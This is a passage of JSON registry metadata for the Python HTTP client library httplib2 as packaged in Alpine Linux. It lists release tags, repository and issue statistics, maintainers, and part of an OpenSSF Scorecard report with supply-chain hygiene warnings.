s/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T17:29:58.632Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.21","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":126,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2024-12-10T17:16:52.155Z","updated_at":"2024-12-10T17:16:52.155Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.21","url":"https://pkgs.alpinelinux.org/packages?branch=v3.21","ecosystem":"alpine","default":false,"packages_count":25394,"maintainers_count":413,"namespaces_count":2,"keywords_count":3607,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1400},"icon_url":"https://github.com/alpinelinux.png","created_at":"2024-12-06T12:06:36.014Z","updated_at":"2026-08-24T05:06:22.358Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/namespaces"}},{"id":6100676,"name":"py2-httplib2","ecosystem":"alpine","description":"Python HTTP client library (for python2)","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2018-05-01T18:31:49.000Z","latest_release_published_at":"2018-05-01T18:31:49.000Z","latest_release_number":"0.11.1-r0","last_synced_at":"2026-03-08T18:24:21.307Z","created_at":"2023-01-31T20:47:01.754Z","updated_at":"2026-08-21T17:29:59.002Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.8/main/x86_64/py2-httplib2","install_command":"apk add py2-httplib2","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge 